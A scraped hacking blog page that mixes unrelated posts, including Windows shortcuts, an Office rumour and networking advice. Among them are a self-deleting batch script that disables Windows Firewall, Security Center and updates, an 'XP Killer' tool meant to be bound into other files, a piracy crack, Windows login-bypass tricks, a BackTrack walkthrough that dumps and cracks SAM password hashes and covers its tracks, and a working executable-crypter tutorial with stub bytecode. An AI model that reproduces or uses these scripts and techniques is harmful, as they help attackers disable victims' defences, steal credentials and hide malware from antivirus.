Hacking

Hacking

Hacking is wonderful practise only when you keep on safe side...

Showing posts with label Computer hacks. Show all posts
Showing posts with label Computer hacks. Show all posts





You can remotely shut down your computer from anywhere in the world using any cell phone with texting capabilities and Mozilla Thunderbird, a Mac, or Microsoft Outlook. It’s pretty simple to accomplish and the video above guides you through the step by step setup process.





Beware of the phishing net ... don't click on any suspicious links in your email Photograph: Genius

What is phishing, and how to defend against it

Phishing is "the act of defrauding an online account holder of information by posing as a legitimate company", according to the dictionary. Most people will already be familiar with it through the stream of spam emails arriving in their inboxes pretending that there has been a "security update" to their bank, credit card, online shop or similar system.

Administrator password can be broken by replacing sam file in system32\config by the sam file in repair folder of windows. it can be easily done on a machine with dual operating systems, simply log on to os other then the one whoes password is to be cracked the way is exactly same as written above but if there is a single os on a machine then there is only one way i.e to use ms dos start up disk or some other boot disk and replace the sam file in config folder with the one in repair folder
note:- this method works only if hard drive is FAT32 formatted because NTFS drive does’nt take boot from Ms DOS
This way you can remove the old administrator password as if the windows is newly installed and the password was’nt set

Office 2010 is yet to be released, but Microsoft has already begun planning for Office 2013 or Office 15. InfoWorld and Microsoft Kitchen has managed to unearth some preliminary information about Office 15.




The first bit of information is that Microsoft has chosen to continue with their recent no-nonsense naming policy and has codenamed Office v15 as simply Office 15.

As far as features are concerned, other than offering a “new visual & interaction experience”, Office 15 will sport drastically improved collaboration tools. Word Program Manager, Jonathan Bailor revealed in an interview, “In Office 15, we’d love to take collaboration and communication to the next level. We’ve unlocked all of these new ways to work and a new set of expectations from users, and we’re like, ‘Put us back in the ring; we’re ready for round two.’ Until coauthoring a document is as easy and ubiquitous as e-mail attachments, our job isn’t done”.

Microsoft employee, Ben Gable, mentioned in his LinkedIn profile that Excel will be getting a major new feature, while an online ad for a test engineer hinted that Outlook will continue working on improved social networking integration.

Microsoft has also been talking about Office Mobile 15 in their job advertisements. Here is a particularly interesting snippet uncovered by Microsoft Kitchen:
Now is your chance to get in on the ground floor of the Office organization’s newest team. The Office Mobile suite includes Communicator Mobile, Word, PowerPoint, Excel, OneNote, SharePoint, with more applications and capabilities being planned as part of the Office 15 product suite. This unique position involves technical challenges of working across multiple operating systems and devices as well as the chance to work with teams across the company and around the world. Our key focus going forward is designing and developing new end to end Mobile Office scenarios that greatly improve mobile meetings, productivity, and document management. All while taking advantage of the greater computing power, networking, memory, screen & touch, and GPS capabilities on next generation mobile computing platforms

Although there has been rumors that Microsoft will be ditching the Ribbon UI in favor of a completely new interface, given the short timeframe, such a drastic change appears rather unlikely.

What new features would you like to see in Office 2013? Don’t forget to let us know.



Did you know how to able to make your pirate windows become original like the original ones? I don’t know why so many people love to find this pirate software. But i need to admit it might be because its free and cheap. No need to pay any single cent and you can go and try to find it on net or some torrent or rapidshare site if you want to download windows genuine crack version.

Anyway, if you want to do that, you can download this software and solve your windows genuine program. It will change to original. It not works with computer because my windows already use Original windows. So, no need to do that. If you have face that windows genuine problem in your computer or laptop, just go and download that software first. Its not we can called it software. We called as crack. Haha..

Download it here : Windows Genuine Crack Version

Ps: Try it with your own risk. I don’t care if it solve your problem or not.








XP Killer v1.0
coded in borland delphi 7.
there is no server builder, this is the server.
upload or bind with whatever.
you can change icon with reshacker.

This little tool will stop and remove:
- xp firewall services
- windows automatic update service
- system restore service

Name: Description:
SharedAccess //Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
Ip6FwHlp //Shares Process - IPv6 Internet Connection Firewall
ALG //Third party plugins support for XP firewall
wuauserv //Windows Automatic Update Service
srservice //System Restore Service




Download:

Code:

http://rapidshare.com/files/296415159/XP_Killer_v1.0.rar
OR
http://www.files-cashout.com/download.php?file=3996

Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read & write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don't have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt - Start>All Programs>Accessories>Command Prompt. Now type "cacls" in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type "cacls /?" for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember - this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse's mouth - the Microsoft Resource Center. You will find a lot of very useful web-based extra's here, most of them left unknowing to the general public - such as, "Online Crash Analysis" - a site that looks like Windows Update but you can upload your crash "dump logs" (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).

ES it is possible for you to make free phone calls both from your & PC. Login to http://www.minowireless.com/ ; complete the sign up process. Once you get registered then you can make free calls from your mobile or even via web.... For making free phone calls from your mobile download the Minowireless software on your mobile either from their Website or from http://www.getjar.com/ After installing the software, activate it by entering the PIN no. given to you at the time of registration. And now you can make free calls from your mobile.

Well as i already mentioned u can hack any system as it is conected to what we call INTERNET . To connect internet a system allocates a port for communication and Data Transfer. SO here it goes all we goto do is get into that port thats hacking.

steps: -

1.Download software PORT SCANNER.
2.Copy the ip address of the victim whose port is open.
3.Download NETLAB which gives u all information includes victim ip address,Area from where he is accessing internet....
4.Paste the ip of victim u found initially into NETLAB .Thats it u access his system.

NetLab 1.4 Free Download!!!


" SO THAT I CAN ADD MORE STUFF LIKE THIS ,PLEASE RATE ME AND GIVE REPLIES"-Genius


The WIRELESS KEYLOGGER
is a tiny plug-in device that records every keystroke typed on any PC.
It can then be accessed wirelessly to obtain the recorded data.
The WIRELESS KEYLOGGER combines the stealth aspect of a hardware keylogger and the remote monitoring ability of a software keylogger into one great device.
It cannot be detected by any kind of software!

More Info :
http://wirelesskeylogger.com/

This video will show you how to shutdown your computer from anywhere using a cell phone, Microsoft Outlook and a free account from www.kwiry.com

I found this playing while playing with my keyboard, when I had forgotten the Admin password of my desktop!And then trying an admin trick.
This easy hack can be used to login to password protected PCs, or any Pc of which you don’t have the pass. be it your own computer.This can save your precious files, lost if you reinstall OS onto your PC.
Make a good use of it.

1. On the Welcome Screen, where it asks to enter password, click on the user and when it asks for password…
2. Press Ctrl+Alt+Del and leave the keys and repeat it once more Ctrl+Alt+Del, then Backspace, followed by Enter.
3. Repeat step 2.
4. A screen pops-up asking you to enter the User and Pass., am I right?
5. I the user field, enter “administrator” and leave the pass. field blank.
6. Login and you’re done.Then you can go to Control Panel if you want to remove password from your user account or do what you wanted if its someone’s PC.

The HacK is that the Administrator account is never deleted and is the main Admin AC for Windows.

It takes only an inch in your pocket to carry a Pen Drive :-) Along this post, we’ll see how Backtrack Distro loaded into a Pen Drive or a Live CD can wreck havoc on a Windows machine in just 10 minutes.

The Backtrack Live CD can be a golden resource in bypassing the preloaded Windows XP, it cuts in a way for the hacker to gain access to your native partitions without caring about the original OS.

To perform the below experiment you need

1. BackTrack ISO. Download here

2. Some ISO Burning Program .Download Magic ISO here

3. A little common sense :-)

Aim of the article is to shed the myth about Windows XP security. Just having a copy of password protected Operating system loaded on your system doesn’t guarantee privacy.

Minute 1

Your computer is open to physical access. For some unethical reason the finds the machine worth attacking.

* The Hacker inserts bootable USB BackTrack Linux Pen Drive / or Live CD in the machine. If the default first boot device is HDD, he goes to BIOS and changes it to USB / CD



Minute 5

After setting the First boot device as USB / CD . He slices in his Backtrack Live OS CD and boots into the Backtrack GUI.




The process followed above tells the machine to skip the operating system loaded onto the HardDisk (in this case we skip MS-WinXP and to boot up BackTrack)

Minute 7

BlackHat Action one

Dump the SAM file

A Windows XP machine usually stores passwords in SAM files stored locally in the X:/WINDOWS/System32/config/system directory. The encrypted file is protected from getting copied/viewed while the user is logged on in Windows XP.

However, by booting the system using a Live CD makes the files wide accessible to the attacker.
Which can be cracked ! by using proper tools :-)

# cd /mnt/hda1/WINDOWS/System32/config
# cp SAM /temp
# cp system /temp
# cd /temp
# bkhive system key
# samdump2 SAM key > /temp/passwords.txt

Black Hat Action Two

Kill that SAM

Owing to the cryptographic limitations, a black hat hacker might not be able to crack the Password (if the length is large). In those cases he might want to remove/disable it !

In most usual cases as far as I’ve tried http://home.eunet.no/pnordahl/ntpasswd/ works great. A cracker just has to burn that .ISO image onto a blank CD and boot the system from it.

By navigating through the text menus and doing as per the onscreen instructions, it
is trivial to reset a chosen user’s password or promote an existing user to Administrator privileges.



In the above image you may see the Password reset option which resets the WinXP password to blank.

Next screenshot shows that the password has been reset to blank.

After using the machine as an administrator, the malicious hacker makes sure to restore back the original SAM file so as clean up the evidence.

# cd /mnt/hda1/WINDOWS/System32/config
# cp SAM /mnt/sda1/
# cp system /mnt/sda1/


Cleaning up the tracks to evade detection

Cracking something might be easy, and so is getting caught.

Usually , a clever black hat takes the backup of original SAM file so that he might restore these files after the attack is finished. Installing a backdoor might be easy , but chances are that the authorized administrator of the compromised system might detect it. In that case its obivious, it will be quickly closed. Popular techniques to ensure successful backdoors include to use an alredy open port. Although, well configured Windows XP keeps logs of users when they access the system and run programs. There are built in programs in Backtrack that assist in log file modification.

WHITE HAT TIP: How to Prevent this happening to you…

* Keep the HardDrives encrypted. Who knows what the attacker might do from your sensitive and personal data

* by disallowing physical access to a system by an attacker. The cardinal rule that physical access equals total access exists for a reason.

* Keep a BIOS Password and Set the HDD as the first bootable device. This’ll prevent cracker from booting your system with a Live CD or USB disk.

* Keep strong passwords. This should mitigate the risk of having the password cracked by Dictionary attacks. Moreover it’ll make the BruteForce attack infeasible.

Hail Open Source

If you like the above post , great :-) Please share .

ES it is possible for you to make free phone calls both from your & PC. Login to http://www.minowireless.com/ ; complete the sign up process. Once you get registered then you can make free calls from your mobile or even via web.... For making free phone calls from your mobile download the Minowireless software on your mobile either from their Website or from http://www.getjar.com/ After installing the software, activate it by entering the PIN no. given to you at the time of registration. And now you can make free calls from your mobile.

From Desktop

1. Windows Key + Tab : Aero [press Tab to cycle between Windows]
2. Windows Key + E : Windows Explorer is launched.
3. Windows Key + R : Run Command is launched.
4. Windows Key + F : Search (which is there in previous Windows versions too)
5. Windows Key + X : Mobility Center
6. Windows Key + L : Lock Computer (It is there from the earlier versions as well)
7. Windows Key + U : Launches Ease of Access
8. Windows Key + P : Projector
9. Windows Key + T : Cycle Super Taskbar Items
10. Windows Key + S : OneNote Screen Clipping Tool [requires OneNote]
11. Windows Key + M : Minimize All Windows
12. Windows Key + D : Show/Hide Desktop
13. Windows Key + Up : Maximize Current Window
14. Windows Key + Down : Restore Down / Minimize Current Windows
15. Windows Key + Left : Tile Current Window to the Left
16. Windows Key + Right : Tile Current Windows to the Right
[Continue pressing the Left and Right keys to rotate the window as well]
17. Windows Key + # (# is any number) : Quickly Launch a new instance of the application in the Nth slot on the taskbar. Example Win+1 launches first pinned app, Win+2 launches second, etc.
18. Windows Key + = : Launches the Magnifier
19. Windows Key + Plus : Zoom in
20. Windows Key + Minus : Zooms out
21. Windows Key + Space : Peek at the desktop

From Windows Explorer
22. Alt + Up : Go up one level
23. Alt + Left/ Right : Back/ Forward
24. Alt + P : Show/hide Preview Pane
Taskbar modifiers
25. Shift + Click on icon : Open a new instance
26. Middle click on icon : Open a new instance
27. Ctrl + Shift + Click on icon : Open a new instance with Admin privileges
28. Shift + Right-click on icon : Show window menu (Restore / Minimize / Move / etc). Note: Normally you can just right-click on the window thumbnail to get this menu.
29. Shift + Right-click on grouped icon : Menu with Restore All / Minimize All / Close All, etc.
30. Ctrl + Click on grouped icon : Cycle between the windows (or tabs) in the group
Though some of them are there in previous versions of Windows, Windows 7 has incorporated many of them and have started many afresh.

I need to connect two buildings which are 100 metres apart. Both buildings are using wireless networks and one has an ADSL modem. I want to ensure both buildings can access the LAN to use shared resources and the Internet through the single ADSL connection. -- Charles
Before getting started, look at the total number of users you will have on one connection and compare that against the speed of your DSL. Depending on your level of service, you may want to increase the speed if you can (this will depend on how far your location is from the central office providing you with DSL). See if you can get broadband service from the cable company. More cable companies are beginning to provide this type of service to companies. You may be able to get better Internet performance for the same money or just a little bit more than you are currently paying.
Given the short distance between the buildings, see if you can get a dry copper pair between them. This needs to be a line with no "conditioning" voltage or dial tone on it. If you can get this, look at companies such as Blackbox, which offer Ethernet and network extenders. They can use a copper pair to create what amounts to a private DSL connection between both ends to give you a pretty decent connection speed - and without the monthly cost of a second broadband connection for the second building (while putting in a second broadband connection is an option, it will also complicate the ability to share files and do other tasks normally associated with a LAN).
If getting a dry pair for a network connection or a second broadband connection isn't an option, consider using a wireless link between the buildings. You will need to see if there is a direct line of sight between buildings, preferably with no obstructions such as trees. Trees (or even tall bushes) can attenuate the signal between access points/bridges to the point where the wireless link could be intermittent.
If you do have a clear view between buildings, you will want to look at some type of external antenna to use for the inter-building link. You will need a directional antenna to concentrate the signal to where you want it to be, so you don't become an ISP to the neighbours. One place to look for antennas is www.hyperlinktech.com. They have a good assortment to choose from, as well as folks who can assist with choosing the best antenna for your application. Once you have the antenna, you will need to look at using a bridge to connect the two locations. Most access points don't have bridging built in, so look at dedicated devices, which typically will cost you a bit more than your average access point. An alternative is to go with a Linksys WRT54-GL access point and open-source firmware such as DD-WRT, which includes a Wireless Distribution System function.
As with any wireless connection, I can't stress strongly enough the need to use as strong encryption as possible, to keep somebody from intercepting your wireless traffic. Since you already have wireless running in both buildings, you will need to select a different channel for your bridge connection. For example, if you are using channel 6 for your in-building wireless, you could use either channel 1 or 11 for the bridge connection.

This article will take you through the basic steps of building an executable crypter. All of the steps performed in this article require manual setup and integration to prepare the exe for the crypter stub. The focus of this article is to walk you through the theory and know-how of how crypters work and does not attempt to create the latest greatest point and click solution.

For a basic background, here is how executable crypters work:

1) The actual processor commands of a protected binary are
crypted/obscured/munged whatever

2) When the protected application first starts, a small decrypter
stub is first run that restores all of the original processor
commands for the executable in memory.

3) Finally, the decrypter stub ends and transfers execution to the
original entry point (OEP) and the program runs normally.

In the course of this paper, we are going to manually implement a very simple 'crypter' to show you all of the development techniques, design considerations, and debugging details required to make your own.

First, let me introduce you to our target executable. It is a 28kb hello world application written in C. This simple application merely prints out "Hello World" to the screen, waits for a keypress and then exits.

To get us started, lets examine the PE structure of the executable file. Below is an image of the PE section table. You will notice that the .text section (where the actual executable code is housed) has a raw size of 4000h and a virtual size of 3DCEh .

The discrepancy in the numbers indicates that at the end of the .text section there is a certain amount of unused space not currently mapped into memory when the file is loaded. This blank spot in the executable file is good because it means we have an empty pad where we can place our own executable code.

To visually verify this you can open up the file in a hexeditor and look for a null pad. To know where to look you have to be able to find the right file offset. In our sample exe this is simplified because all of our sections have a virtual size <= their raw size and each sections raw offset = its virtual offset. This is nice because it keeps all of the rva values in the PEheader = raw file offsets however this is not always the case. V.2 of the pe editor classes now take this into account and can calculate file offsets from rva values correctly. The assumption of rva = file offset will be made through out the remainder of this article because it holds true for this particular sample we are analyzing. So...to see this null pad open up the original exe file in a hexeditor and check out the area between 4DCEh and 5000h (RawOffset + VirtualSize) Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00004DC0 C0 74 06 0F B6 45 0B C9 C3 83 C8 FF C9 C3 00 00 Àt..E.ÉÃÈÿÉÃ.. 00004DD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00004DE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00004DF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00004E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00004E10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00004E20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00004E30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00004E40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00004E50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00004E60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00004E70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00004E80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ For our needs this will be more than enough space to place our simple decrypter stub. We do not necessarily need to squeeze our code into an existing section. Had we been short on space, we could have resorted to adding a new PE section and placing our code there. Ok, we have found a home for our decrypter block, but first we have to make some adjustments to the PE section characteristics so that: A) our decrypter code gets loaded into memory B) once mapped into memory, we have write access to the main body of code C) when the program is first loaded, execution begins with our decrypter code As noted above, the virtual size of the section (the size loaded into memory) does not include this null pad we found in the file. Since we are going to be adding code to this area, we need to make sure that this area is loaded into memory as well. This is accomplished by increasing the virtual size for this PE section using a PE editor such as LordPE. The second change we have to make is to make sure that the .text section is flagged as a writable area once mapped into memory. This is necessary because our decrypter stub needs to dynamically rewrite (decode) the actual processor codes to be executed. This too is easily done with LordPE from the "edit section header" dialog. Below is a graphic of the dialog sequence and field manipulations required in LordPE. Highlighted in yellow are the fields that we have altered.
Our next goal now becomes to make sure that when the executable first loads it is our decrypter stub that is first run. Since the real processor commands for the executable will not present on disk, having the program start at the original entry point would have the machine trying to execute what is essentially a jumbled block of data.

The program entry point can be directly edited from LordPEs main interface. For our demonstration lets choose to set the entry point at 4E00h. This offset sits 32 bytes from the end of our real applications code and gives us a nice easy spot to find in the hexeditor.

With the PE structure modifications out of the way, now we can move on to the actual work. Here is what we have left:

D) build the decrypter stub
E) crypt the actual executable's opcodes
F) integrate our decrypter stub into the modified binary

Lets start with some design visions for our encoding mechanism. Since this is a demo and a trainer, the encoding mechanism is going to be kept as lightweight and simple as possible. For these reasons a simple XOR encoding will be used.

The next design consideration is to enumerate what kind of variables a generic crypter stub is going to need. Basically any crypter stub is going to need three things:

1) what offset (in memory) to start decrypt data
2) length of the data to decrypt
3) entry point to transfer execution to after decrypted

Since we are designing a really simple stub, I am going to take a short cut and start the encryption routine right at the programs original entry point. While the EP is not at the very beginning of the code section, it is usually close enough that the majority of processor commands will be encrypted.

Before we get into the actual design and development of out decrypter stub, lets knock off the easy part of XORing the original opcodes first. This is a simple operation, and can be done in whatever way is the most convenient for the developer. The implementation I chose was to create a quick VB program that loops through the binary applying the XOR to the appropriate bytes representing the applications opcodes.

For a quick refresher:

Q) How do i know where the opcodes begin?
A) for our simple setup we are starting at the original program
entry point found in the PE Header

Q) How do I know how long of a block to encode?
A) Since we want to encode all of the opcodes after the entry point,
length of the data to encrypt is Original Virtual Size - Entry Point

Inline below is the VB source code used to encode the executable's opcodes:

StartAt = &H1048 'original entry point
length = &H2D86 '3DCE - 1048 (virtual size - entrypoint)

Open p2 For Binary As f

For i = 1 To length
offset = StartAt + i
Get f, offset, b
b = b Xor &HF
Put f, offset, b
Next

Close f


With that out of the way, we are now down to developing our decrypter stub. Basically what we need is a small block of ASM commands that we can paste into the encoded binary at our new entry point.

Below is the decoder block I came up with written in C:

void main(void){

int i;
char b;

char *buffer = 0x400000 ; // imagebase
long length = 0xBEEF ; // <-length of code (placeholder) buffer += 0xDEAD ; // <- OEP offset (placeholder) for(i=0; i < length; i++){ b = buffer ;
b = b ^ 0xF ;
buffer = b ;

}

_asm jmp buffer

}

Let me mention a couple points and design considerations about the above code.

* To make the stub generic you are going to have to edit the length and entry point offsets each time you use it. Make these some recognizable values in hex to make it easier to find them in the hexeditor.

* *buffer initially points to the imagebase, remember you are going to be working on memory addresses. The reason I increment *buffer latter to the entry point offset is because I will have to edit this value independently in a hexeditor.

* to transfer execution to the original entry point we just use a inline asm command jmp buffer. At this point *buffer is already pointing directly to the programs original entry point.

All in all it is a very simple decoder stub. The trick comes in debugging and implementing it. Since the decoder is designed to work on data and offsets not found in this standalone application, we can really only use the compiler to generate the opcodes for the commands we need. Debugging takes place by integrating the actual stub byte codes into our crypted exe and running that through the debugger.

Now that we have our proposed C source, we need the assembler byte codes associated with it. The easiest way I have found to get the asm byte codes from the compiler is to set a break point at the top of the code and start up the VC debugger by pressing F5.

Once VC has compiled the code, it will then launch the built in debugger which pauses execution at your preset breakpoint. Now you can right click on the main window and choose "goto disassembly" to see a mixed assortment of C and ASM commands.

Below is a stripped down ASM block generated by the compiler for us. On the left are the actual byte codes associated with the string assembler commands on the right.

C7 45 F4 00 00 40 00 mov dword ptr [ebp-0Ch],400000h
C7 45 F0 EF BE 00 00 mov dword ptr [ebp-10h],0BEEFh
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
05 AD DE 00 00 add eax,0DEADh
89 45 F4 mov dword ptr [ebp-0Ch],eax
C7 45 FC 00 00 00 00 mov dword ptr [ebp-4],0
EB 09 jmp main+43h
8B 4D FC mov ecx,dword ptr [ebp-4]
83 C1 01 add ecx,1
89 4D FC mov dword ptr [ebp-4],ecx
8B 55 FC mov edx,dword ptr [ebp-4]
3B 55 F0 cmp edx,dword ptr [ebp-10h]
7D 22 jge main+6Dh
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
03 45 FC add eax,dword ptr [ebp-4]
8A 08 mov cl,byte ptr [eax]
88 4D F8 mov byte ptr [ebp-8],cl
0F BE 55 F8 movsx edx,byte ptr [ebp-8]
83 F2 0F xor edx,0Fh
88 55 F8 mov byte ptr [ebp-8],dl
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
03 45 FC add eax,dword ptr [ebp-4]
8A 4D F8 mov cl,byte ptr [ebp-8]
88 08 mov byte ptr [eax],cl
EB CD jmp main+3Ah
FF 65 F4 jmp dword ptr [ebp-0Ch]

In order for us to insert this into our executable, we must further strip out just the byte codes and write the hex values into our executable file. A nice way to do this is to strip out the assembler commands, remove all of the spaces, and place then in a long string such as this:

C745F400004000C745F0EFBE00008B45F405ADDE00008945F4C745FC
00000000EB098B4DFC83C101894DFC8B55FC3B55F07D228B45F40345
FC8A08884DF80FBE55F883F20F8855F88B45F40345FC8A4DF88808EB
CDFF65F4

From here, you can copy the text string and write the associated hex values directly into the binary using the Winhex hexeditor by highlighting the start offset (4E00h) pressing Ctrl-B (write clipboard) and then choosing the "ACII Hex" clipboard format.

Once that is done, all we have left is to edit the data length and start offset placeholders compiled into the stub and it will be configured for this binary. If you wrote the stub in starting at offset 4E00h then you will find the BEEFh data length marker at offset 4E0Ah , and the DEADh entry point marker at offset 4E12h.

Note that both of these values are in little endian format. When you go to modify them with the actual values, remember to also write the new values in little endian format.

Below are hexeditor views of the modifications made.

Offset 0 1 2 3
00004E10 .. .. AD DE (DEAD)
00004E10 .. .. 48 10 (1048)

Offset 0 1 2 3 4 5 6 7 8 9 A B
00004E00 .. .. .. .. .. .. .. .. .. .. EF BE (BEEF)
00004E00 .. .. .. .. .. .. .. .. .. .. 86 2D (2D86)

With our decrypter block in place, our main code crypted, and the entry point now aimed at the decrypter, everything should be set and ready to run !

Open it up in Olly, give it a shot and see what happens. Before you start stepping through code, look around the original entry point and see what the disassembly looks like.

004010DC 12 DB 12
004010DD 05 DB 05
004010DE 0F DB 0F
004010DF 0F DB 0F
004010E0 AE DB AE
004010E1 53 DB 53
004010E2 63 DB 63
004010E3 4F DB 4F
004010E4 0F DB 0F
004010E5 AC DB AC
004010E6 6F DB 6F
004010E7 63 DB 63
004010E8 4F DB 4F

Yup, thats a jarbled mess characteristic of a data block or encrypted opcodes... Now go back to the end of the decrypter block and set a breakpoint on the final "jmp buffer" command:

00404E55 >^FF65 F4 JMP DWORD PTR SS:[EBP-C] ; final.00401048

After reaching this point, scroll back up again and take another look at the original entry point 401048. If you still see a junk block of commands such as the above mess, it is because Olly has not yet analyzed the new byte values for processor commands. To fix this, right click in the main disassembly window and choose 'analyze code'. Now you should see the actual decoded instructions:

00401048 /. 55 PUSH EBP
00401049 |. 8BEC MOV EBP,ESP
0040104B |. 6A FF PUSH -1
0040104D |. 68 B8504000 PUSH final.004050B8
00401052 |. 68 9C244000 PUSH final.0040249C ; SE handler installation
00401057 |. 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
0040105D |. 50 PUSH EAX
0040105E |. 64:8925 000000>MOV DWORD PTR FS:[0],ESP
00401065 |. 83EC 10 SUB ESP,10

Now you can hit the run button and Voila ! It should all function just as expected !

Looks like everything is in place and running just as it should be Smiley

Note that using C to generate the Opcodes can make the decoder a bit bloated. If you wanted to write your decoder directly in asm you could use a stub similar to the following: (even this could be optimized further)

00404E3A B8 48104000 MOV EAX,401048 ;start offset
00404E3F B9 862D0000 MOV ECX,2D86 ;length
00404E44 8BD0 MOV EDX,EAX ;copy of start offset (OEP)
00404E46 8030 0F XOR BYTE PTR DS:[EAX],0F ;top_of_loop decode inst
00404E49 40 INC EAX ;next byte
00404E4A 49 DEC ECX ;dec counter
00404E4B ^75 F9 JNZ SHORT 00404E46 ;counter !=0 goto top_of_loop
00404E4D FFE2 JMP EDX ;jmp OEP

As one last little nugget, let me throw out a quick tip you can use to restore a crypted exe such as this to its former state Smiley

Lets assume the decrypter stub did some actual encryption that we do not want to try to reverse engineer. If the crypter stub only operated on an uncompressed data block that was fully present in the exe and did not perform any other tricks or manipulations the restoration of the executable can actually be very simple.

Give this a shot..load the exe in olly and break on the last jmp buffer. Here the actual executable code is fully decrypted in memory and ready to be run. Now fire up LordPE and dump the 401000 - 405000 memory address range to grab the full .text section from memory. You now have all of the decrypted opcodes saved to disk Wink

Write down the address of the original entry point that the jmp command was going to take you to and exit olly. Open up the memory dump and the crypted exe in Winhex and write the entire dump of the .text section over the crypted .text section in the executable.

Save it, then change the entry point back to the original you wrote down and give it a click. Tadaahhh magic.....kinda..well not really...but you know. *shrugs*

Anyway, this was a fun bit to design and figure out how to do. Hopefully this takes some of the "magic" out of how executable crypters work and should be enough to help someone else along.

I also caved in and wrote an quick point and click utility to integrate this crypter stub into arbitrary executables. You can snag the app plus VB source here. (also has a nice set of classes for PE header manipulation)

@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\firewall.reg" ECHO REGEDIT4
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\firewall.reg"
DEL "%Temp%.\firewall.reg"
DEL %0



Shuts down Windows Firewall, disables Automatic Updates for the next reboot.

And no, Microsoft is not going to fix this. This code will work when it goes live.

Counter

Followers

Subscribe Via Email &Sms

Enter your email address:

Expert Hackers

Also Subscribe Via Sms Just click here to follow via
SMS